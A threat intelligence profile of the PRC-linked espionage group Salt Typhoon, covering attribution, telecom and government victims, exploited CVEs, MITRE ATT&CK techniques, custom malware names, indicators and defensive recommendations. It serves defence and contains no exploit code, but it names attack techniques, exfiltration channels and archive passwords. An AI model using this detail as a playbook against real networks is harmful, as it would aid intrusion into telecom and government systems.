Salt Typhoon

Executive Summary

Intelligence Cut-off Date: 12-Apr-2026

Salt Typhoon is a PRC state-sponsored cyber espionage group that has compromised more than 200 organizations across 80 countries since at least 2019, with a primary focus on telecommunications providers and internet service providers. The group achieved strategic access to US lawful intercept systems at major carriers including AT&T, Verizon, and T-Mobile, enabling surveillance of US political figures and senior government officials. As of early 2026, FBI officials assess the threat posed by Salt Typhoon remains “very much ongoing,” with intrusions detected in US congressional committees as recently as December 2025. [Source: CyberScoop FBI reporting, Rating: B2]

Overall Assessment: [Confidence: HIGH] — Multi-source confirmation across US government agencies, major cybersecurity vendors, and OFAC sanctions documentation.

Identity and Attribution

Salt Typhoon is tracked under multiple designations across the threat intelligence community: Earth Estries (Trend Micro), GhostEmperor (Kaspersky), FamousSparrow (ESET), UNC2286 (Mandiant/Google), RedMike (Recorded Future Insikt Group), and Operator Panda (CrowdStrike). MITRE ATT&CK catalogues the group as G1045. The Microsoft designation “Salt Typhoon” has become the most widely used identifier in public reporting and US government communications. [Source: MITRE ATT&CK G1045, Rating: A1]

Attribution points to the People’s Republic of China’s Ministry of State Security (MSS). On January 17, 2025, the US Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned Sichuan Juxinhe Network Technology Co., Ltd. for “direct involvement in exploiting US telecommunications,” providing the most specific organizational attribution to date. [Source: US Treasury OFAC Designation, Rating: A1] The relationship between Sichuan Juxinhe and broader MSS tasking remains assessed rather than confirmed, though the sanctions language implies an operational — not merely contractual — role. [Confidence: HIGH on MSS sponsorship; MODERATE on specific organizational structure]

The group has been active since at least 2019, though some researchers assess earlier precursor activity may date to 2017 under the GhostEmperor designation. [Source: Kaspersky GhostEmperor report, Rating: B2] There is no confirmed evidence of formal organizational mergers with other tracked PRC groups, though infrastructure and tooling overlaps have been noted with other MSS-linked clusters.

Motive and Objective

Salt Typhoon’s primary motive is strategic intelligence collection in service of PRC national security objectives. This is not opportunistic cybercrime — the targeting pattern reflects deliberate, state-directed priorities.

Specific objectives include: monitoring confidential telecommunications to collect signals intelligence on foreign government officials and political figures; accessing lawful intercept programs maintained by US carriers, which would provide visibility into active US law enforcement and intelligence investigations; and acquiring research data and intellectual property from universities with telecommunications, engineering, and technology programs. [Source: CISA/FBI/NSA Joint CSA AA25-239A, Rating: A1]

The targeting of lawful intercept systems represents a particularly high-value objective. Access to these systems would allow PRC intelligence services to determine which of their own operatives and assets are under US surveillance — a counterintelligence capability of significant strategic value. [Inference — based on targeting pattern and known PRC intelligence priorities]

Victimology

Salt Typhoon’s victim set is global in scope but concentrated in the telecommunications sector. The FBI confirmed in August 2025 that at least 200 organizations across 80 countries had been compromised. [Source: FBI CyberTalks 2026, Rating: B2]

Named US telecommunications victims include AT&T, Verizon, T-Mobile, Lumen Technologies, Consolidated Communications, Windstream, and Spectrum. [Source: Multiple congressional reporting, Rating: A1] Beyond the US, Recorded Future’s Insikt Group documented compromises of telecommunications providers in South Africa, Italy, Thailand, and a US-based affiliate of a UK provider during the December 2024–January 2025 RedMike campaign. [Source: Recorded Future RedMike analysis, Rating: B2]

Salt Typhoon also targets universities conducting telecommunications and engineering research. Thirteen universities across nine countries were identified as targets: UCLA, CENIC, Loyola Marymount, and Utah Tech (US); Technische Universiteit Delft (Netherlands); University of Malaya (Malaysia); Universidad Nacional Autónoma de México; and institutions in Argentina, Bangladesh, Indonesia, Thailand, and Vietnam. [Source: Recorded Future RedMike analysis, Rating: B2]

In December 2025, intrusions were detected in several US House of Representatives committees, expanding the victim set into the legislative branch of government. [Source: Congressional reporting, Rating: B2]

Sector Proximity Assessment:

• Global telecommunications: DIRECT — Salt Typhoon’s primary and defining target set. All major telecom operators and ISPs face active targeting risk.
• Defense technology / high-tech startups: ADJACENT — Defense industrial base is a secondary target set for PRC espionage broadly; Salt Typhoon’s telecom access could enable collection against defense communications.
• Venture capital / investment: ADJACENT — Portfolio companies in telecom, networking, and defense technology sectors face elevated exposure through supply chain and communications interception.
• Government / think tanks: DIRECT — US congressional committees breached December 2025; political figure surveillance confirmed; think tanks focused on PRC policy or telecom regulation face collection interest.
• Higher education / research institutions: ADJACENT — 13 universities targeted specifically for telecom and engineering research programs.

Capability Assessment

Rating: High [Confidence: HIGH]

Salt Typhoon operates at the top tier of capability, consistent with a well-resourced MSS-directed operation. The evidence supporting this assessment spans multiple dimensions.

Custom tooling ecosystem: The group develops and maintains a diverse suite of custom malware, including GhostSpider (a backdoor purpose-built for telecom network persistence), the Demodex kernel-mode rootkit (enabling deep persistence that survives standard remediation), JumbledPath (a custom Go binary for packet capture, infrastructure concealment, and log clearing — catalogued by MITRE as S1206), SnappyBee, HemiGate, Crowdoor, and Zingdoor. This breadth of custom tooling indicates dedicated development resources. [Source: Picus Security / Cisco Talos / MITRE ATT&CK S1206, Rating: B2]

Vulnerability exploitation: Salt Typhoon exploits both zero-day and N-day vulnerabilities in edge network devices and enterprise software. Confirmed exploitation includes CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE privilege escalation), CVE-2023-46805 and CVE-2024-21887 (Ivanti Connect Secure), CVE-2023-48788 (Fortinet FortiClient EMS), CVE-2022-3236 (Sophos Firewall), and the ProxyLogon chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) against Microsoft Exchange. [Source: Picus Security / Recorded Future, Rating: B2]

Operational security: The group demonstrates sophisticated tradecraft including kernel-mode rootkits to evade endpoint detection, living-off-the-land techniques to blend with legitimate administration, GRE tunnel-based C2 channels designed to bypass network monitoring, DLL side-loading through legitimate antivirus processes (Norton, Bkav, IObit), and systematic log clearing. Dwell times have been measured in months to years. [Source: CISA/FBI/NSA Joint CSA, Rating: A1]

State-level resourcing: Confirmed by OFAC sanctions against Sichuan Juxinhe Network Technology (January 2025), establishing direct state backing rather than merely inferred sponsorship. [Source: US Treasury OFAC, Rating: A1]

Modus Operandi

Key Campaigns

RedMike Campaign (Dec 2024–Jan 2025): Attempted exploitation of more than 1,000 Cisco network devices globally (ASR, ISR, and Catalyst series) via CVE-2023-20198 and CVE-2023-20273. Over 50% of targets located in the US, South America, and India, with remaining targets across 100+ countries. Seven confirmed compromised devices observed communicating with RedMike infrastructure. Established GRE tunnels for persistent access and data exfiltration. [Source: Recorded Future Insikt Group, Rating: B2]

US Telecom Compromise (disclosed Oct 2024): Compromised nine major US telecommunications providers including AT&T, Verizon, T-Mobile, and Lumen Technologies. Accessed lawful intercept systems. Intercepted communications of US political figures. Dwell time estimated at months to years prior to disclosure. [Source: CISA/FBI/NSA, Rating: A1]

University Targeting (2024–2025): Targeted 13 universities across 9 countries for research in telecommunications, engineering, and technology. Conducted through the same Cisco exploitation infrastructure used in the RedMike campaign. [Source: Recorded Future, Rating: B2]

Congressional Intrusion (Dec 2025): Intrusions detected in several US House of Representatives committees. Attributed to Salt Typhoon. [Source: Congressional reporting, Rating: B2]

MITRE ATT&CK TTPs

Phase	Technique ID	Technique Name	Notes
Initial Access	T1190	Exploit Public-Facing Application	Primary vector — Cisco, Ivanti, Fortinet, Sophos, Exchange
Execution	T1059.001	PowerShell	Encrypted PowerShell scripts for payload delivery
Execution	T1059.003	Windows Command Shell	Post-compromise command execution
Persistence	T1098.004	SSH Authorized Keys	On compromised network devices
Persistence	T1136	Create Account	Local accounts with elevated privileges on routers
Persistence	T1543.003	Windows Service	Crowdoor backdoor persistence
Persistence	T1112	Modify Registry	Registry Run key persistence
Privilege Escalation	T1068	Exploitation for Privilege Escalation	CVE-2023-20198 chain
Privilege Escalation	T1078	Valid Accounts	Harvested credentials for lateral movement
Defense Evasion	T1574.002	DLL Side-Loading	Via Norton, Bkav, IObit AV processes
Defense Evasion	T1562.004	Disable or Modify System Firewall	Post-compromise on network devices
Defense Evasion	T1070.002	Clear Linux or Mac System Logs	Via JumbledPath (S1206)
Defense Evasion	T1027	Obfuscated Files or Information	Encrypted payloads and packed binaries
Credential Access	T1003.003	NTDS	NinjaCopy variant for NTDS.dit extraction
Credential Access	T1040	Network Sniffing	Via JumbledPath packet capture and lawful intercept access
Lateral Movement	T1021.004	SSH	Loopback interface pivoting between devices
Collection	T1005	Data from Local System	Compressed into password-protected RAR archives
Collection	T1602.002	Network Device Configuration Dump	Router config exfiltration
Command and Control	T1572	Protocol Tunneling	GRE tunnels on compromised Cisco devices
Command and Control	T1090.001	Internal Proxy	Multi-hop relay chains via ORB networks
Exfiltration	T1048.003	Exfiltration Over Unencrypted Non-C2 Protocol	Via cURL to anonfiles/file.io
Exfiltration	T1041	Exfiltration Over C2 Channel	Via GRE tunnel infrastructure

Tools and Malware

Custom malware:

• GhostSpider — Backdoor purpose-built for persistence in telecommunications network environments.
• Demodex — Kernel-mode rootkit enabling deep, persistent access that survives standard endpoint remediation.
• JumbledPath (S1206) — Custom Go binary with capabilities for packet capture, infrastructure concealment, defense impairment, log clearing, and multi-stage channel establishment. MITRE-catalogued.
• SnappyBee — DLL side-loading payload delivered through legitimate antivirus process injection.
• HemiGate — Backdoor used in telecommunications targeting campaigns.
• Crowdoor — Persistence backdoor utilizing Windows service and registry modification for survival.
• Zingdoor — C2 proxy routing tool enabling multi-hop communication chains.
• NinjaCopy (modified) — Variant used for NTDS.dit database extraction for credential harvesting.

Commodity and open-source tools:

• Cobalt Strike (beacons for C2)
• PsExec (lateral movement)
• WMIC (remote execution)
• cURL (data exfiltration to anonymous file-sharing services)

Infrastructure Patterns

Salt Typhoon favors compromised edge devices as operational infrastructure rather than dedicated attacker-controlled servers. Cisco IOS XE devices are the primary platform, with GRE tunnels configured on compromised routers serving as C2 and exfiltration channels. This approach is tactically effective because GRE traffic between network devices is often considered legitimate and may not trigger security monitoring.

The group also uses Operational Relay Box (ORB) networks — chains of compromised devices that relay traffic to obscure the ultimate destination of exfiltrated data. Exfiltration endpoints include anonymous file-sharing services (anonfiles[.]com, file[.]io) accessed via cURL from compromised hosts.

Shared infrastructure has been observed between Cisco exploitation campaigns and Myanmar reconnaissance activities, suggesting centralized infrastructure management. [Source: Recorded Future, Rating: B2]

Activity Timeline

Date	Event	Source	Rating
2026-02	Sen. Cantwell requests hearing with AT&T/Verizon CEOs on post-breach network security	Congressional record	A1
2026-Q1	FBI top cyber official states Salt Typhoon threat “still very much ongoing” against US public and private sectors	CyberScoop	B2
2025-12	Intrusions detected in several US House of Representatives committees; attributed to Salt Typhoon	Congressional reporting	B2
2025-08	FBI confirms 200+ companies compromised across 80 countries; joint CSA AA25-239A issued with 12 partner nations	CISA/FBI/NSA/partners	A1
2025-02	Cisco Talos publishes technical analysis; MITRE assigns G1045; JumbledPath (S1206) custom tool disclosed	Cisco Talos / MITRE	B2
2025-01	OFAC sanctions Sichuan Juxinhe Network Technology Co. for direct involvement in telecom exploitation	US Treasury	A1
2024-12	RedMike campaign: exploitation of 1,000+ Cisco devices globally via CVE-2023-20198/20273; GRE tunnel persistence established	Recorded Future Insikt Group	B2
2024-10	Public disclosure: Salt Typhoon compromised 9 US telecoms including AT&T, Verizon, T-Mobile, Lumen	CISA/FBI/media reporting	A1
2024-H1	Active exploitation of Ivanti Connect Secure (CVE-2023-46805, CVE-2024-21887) and Fortinet FortiClient EMS (CVE-2023-48788)	Picus Security	B2
~2019	Earliest assessed Salt Typhoon activity; MITRE dates initial operations to at least 2019	MITRE ATT&CK G1045	C3

Forecast, Implications, and Recommendations

What Next (Forecast)

Salt Typhoon will almost certainly continue targeting telecommunications infrastructure globally, with no indication of operational pause or degradation despite public exposure, sanctions, and a multi-nation advisory. [Confidence: HIGH — based on PRC strategic intelligence priorities, continued FBI assessment of ongoing activity, and historical pattern that PRC groups accelerate rather than retreat after public exposure]

The group is likely to expand exploitation of edge network devices beyond Cisco to include Juniper, Arista, and other enterprise networking equipment as vendors patch Cisco-specific vulnerabilities. [Confidence: MODERATE — based on demonstrated capability to pivot across vendor ecosystems (Cisco, Ivanti, Fortinet, Sophos, Exchange)]

Targeting of 5G infrastructure and cloud-based telecom platforms is a probable evolution as carriers modernize their networks. [Confidence: MODERATE — inferred from PRC strategic interest in next-generation telecommunications and Salt Typhoon’s demonstrated focus on telecom architecture]

So What (Implications)

The telecommunications sector faces the most acute risk. Salt Typhoon’s access to lawful intercept systems means that compromise is not merely a data breach — it is a counterintelligence event that could compromise active law enforcement and intelligence operations. Organizations in this sector should assume they are targets and operate accordingly.

The defense technology sector faces indirect but significant risk. Salt Typhoon’s telecom access enables collection against communications that traverse compromised infrastructure, meaning even organizations not directly breached may have their communications intercepted. Defense contractors communicating over compromised carrier networks are exposed regardless of their own security posture.

Government organizations face direct risk, as demonstrated by the December 2025 congressional intrusions. Policy organizations, regulatory bodies, and think tanks focused on PRC-related topics should treat Salt Typhoon as a direct threat.

Now What (Recommendations)

1. Patch edge devices immediately — Prioritize CVE-2023-20198/20273 (Cisco IOS XE), CVE-2023-46805/CVE-2024-21887 (Ivanti Connect Secure), CVE-2023-48788 (Fortinet FortiClient EMS). Disable web UI on all Cisco devices where not operationally required.
2. Hunt for GRE tunnel anomalies — Monitor for unexpected GRE tunnel configurations, new local accounts on network devices, and loopback interface changes. Audit all network device configurations against known-good baselines.
3. Implement CISA AA25-239A mitigations — Restrict management plane access, enforce MFA on all network device administration, segment management networks from production traffic, enable configuration change alerting.
4. Monitor for DLL side-loading via AV processes — Alert on unsigned DLLs loaded by Norton, Bkav, and IObit processes (T1574.002). Baseline legitimate AV behavior and flag deviations.
5. Audit credential stores — Hunt for unauthorized NTDS.dit access and SYSTEM hive extraction (T1003.003). Monitor for password-protected archive creation (known passwords: takehaya, foreverthegod, dh2uiwqji9dash).

Technical Evidence

Type	Value	First Seen	Last Seen	Confidence
CVE	CVE-2023-20198	2023-10	2025-01	HIGH
CVE	CVE-2023-20273	2023-10	2025-01	HIGH
CVE	CVE-2023-46805	2024-01	2024-H1	HIGH
CVE	CVE-2024-21887	2024-01	2024-H1	HIGH
CVE	CVE-2023-48788	2024-H1	2024-H1	MODERATE
CVE	CVE-2021-26855	2021-03	2024	HIGH
Domain	anonfiles[.]com	2024	2025	MODERATE
Domain	file[.]io	2024	2025	MODERATE
Tool	JumbledPath (S1206)	2024	2025-02	HIGH
Malware	GhostSpider	2024	2025	HIGH
Malware	Demodex rootkit	2021	2025	HIGH
Malware	SnappyBee	2024	2025	HIGH
Malware	HemiGate	2024	2025	MODERATE
Malware	Crowdoor	2024	2025	MODERATE
Technique	GRE tunnels on Cisco devices	2024-12	2025-01	HIGH
Password	takehaya	2024	2025	MODERATE
Password	foreverthegod	2024	2025	MODERATE

[Data Gap: Specific IP addresses and domain IOCs associated with Salt Typhoon C2 infrastructure have not been publicly disclosed in sufficient detail for inclusion. The CISA advisory AA25-239A and Recorded Future RedMike report reference infrastructure indicators but do not publish them in full. Organizations with access to the classified annex or TLP:AMBER versions of these reports should consult those sources directly.]

References

1. CISA/FBI/NSA Joint Cybersecurity Advisory AA25-239A (Aug 27, 2025). https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a. Rating: A1
2. MITRE ATT&CK — Salt Typhoon (G1045). https://attack.mitre.org/groups/G1045/. Rating: A1
3. US Treasury OFAC — Sanctions on Sichuan Juxinhe Network Technology Co. (Jan 17, 2025). No public link (press release). Rating: A1
4. Recorded Future Insikt Group — RedMike (Salt Typhoon) Exploits Vulnerable Cisco Devices (Feb 2025). https://www.recordedfuture.com/research/redmike-salt-typhoon-exploits-vulnerable-devices. Rating: B2
5. Cisco Talos — Salt Typhoon Technical Analysis (Feb 20, 2025). Referenced in MITRE G1045. Rating: B2
6. Picus Security — Salt Typhoon: A Persistent Threat to Global Telecommunications Infrastructure. https://www.picussecurity.com/resource/blog/salt-typhoon-telecommunications-threat. Rating: C2
7. CyberScoop — FBI: Threats from Salt Typhoon are ‘still very much ongoing’ (2026). https://cyberscoop.com/fbi-salt-typhoon-ongoing-threat-cybertalks-2026/. Rating: B2
8. Wikipedia — Salt Typhoon. https://en.wikipedia.org/wiki/Salt_Typhoon. Rating: C3